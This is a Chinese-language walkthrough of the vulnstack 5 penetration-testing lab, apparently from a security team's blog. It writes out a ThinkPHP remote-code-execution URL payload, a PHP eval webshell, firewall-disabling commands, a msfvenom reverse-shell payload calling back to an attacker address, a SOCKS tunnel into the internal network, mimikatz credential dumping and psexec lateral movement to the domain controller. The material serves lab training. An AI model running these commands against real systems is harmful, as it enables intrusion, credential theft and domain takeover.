一 环境搭建
1、项目地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
2、网络配置信息
1.VMware新建网卡VMnet6,选择仅主机模式,并将网段IP设置为192.168.138.0
2.Win7设置双网卡,一个网卡选择VMnet6、另一个NAT
模拟外网IP:192.168.10.128(在Win7主机开启IP自动获取)
内网IP:192.168.138.136
账号密码:sunheart 123.com 和 sunAdministrator dc123.com
3.Windows 2008 连接VMnet6
内网IP:192.168.138.138
sunadmin 2020.com
4、开启web环境
二 外网渗透
1、端口扫描
nmap -T4 -sC -sV 192.168.10.128
2、访问80端口
#尝试页面报错,获取thinkphp具体版本
http://192.168.10.128/?s=1
3、搜索thinkphp
searchsploit thinkphp
4、查看46150.txt
cd /usr/share/exploitdb/exploits/php/webapps
cat 46150.txt
5、直接使用文件内的payload进行攻击,whoami试一下
执行成功
6、写入一句话木马
#写入webshell的命令
echo "<?php @eval($_POST[cmd]);?>" > 66.php
http://192.168.10.128/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST[cmd]);?>" > 66.php
写入成功
查看文件
http://192.168.10.128/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir
7、蚁剑进行连接
三、信息收集
1、查看ip发现有两个网卡一个内网一个外网
2、whoami查看权限发现是管理员权限
3、执行net config workstation发现域名叫sun.com
3.1域内信息收集
1、查看域内用户
net user /domain
2、查询域内主机
net group "domain computers" /domain
3、查看域控制器
net group "domain controllers" /domain
4、查看域管理员
net group "domain admins" /domai
5、域控制器的名字叫DC,域名叫sun.com,拼接起来直接ping域名
ping DC.sun.com
四、横向移动
4.1 路由转发和代理通道
1、在蚁剑里先关闭他的防火墙
netsh advfirewall set domainprofile state off#关闭域防火墙
netsh advfirewall set privateprofile state off#关闭四方防火墙
netsh advfirewall set publicprofile state off#关闭公网防火墙
netsh firewall show state#查看防火墙状态
2、生成一个木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.129 LPORT=6060 -f exe > chuid.exe
3、用蚁剑上传上去
4、设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.129
set lport 6060
run
执行exe文件
5、添加路由
在msfconsole里面添加一个通向192.168.138.0网段的路由
route add 192.168.138.0 255.255.255.0 1
route print
6、搭建代理隧道
攻击端上传ew_for_linux64并执行如下命令:
./ew_for_linux64 -s rcsocks -l 1080 -e 1234
Win7上传ew_for_Win.exe并执行如下命令:
ew_for_win.exe -s rssocks -d 192.168.10.129 -e 1234
7.配置proxychain
将socks5服务器指向127.0.0.1:1080,便可以使用proxychains将我们的程序代理进内网。
4.1抓取域用户密码
1.使用wiki模块抓取密码
2、进程迁移
ps
# 通过进程id,选择一个64为进程进行迁移
migrate pid
3、密码抓取
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords
抓到administrator的密码是dc123.com
4.3 使用Psexec登录域控
1、使用exploit/windows/smb/psexec模块
use exploit/windows/smb/psexec
set rhosts 192.168.138.138
set SMBDomain SUN
set SMBUser administrato
set SMBPass dc123.com
set payload windows/meterpreter/bind_tcp
run
2.远程关闭域控防火墙
sessions创建失败,可能是由于防火墙导致,远程关闭。
net use \192.168.138.138ipc$ "dc123.com" /user:"administrator"
利用sc创建服务来远程关闭Windows 2008的防火墙
#创建服务
sc \192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
#启动服务
sc \192.168.138.138 start unablefirewall
3.使用exploit/windows/smb/psexec模块
至此拿下域控
原文始发于微信公众号(揽月安全团队):vulnstack——5
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论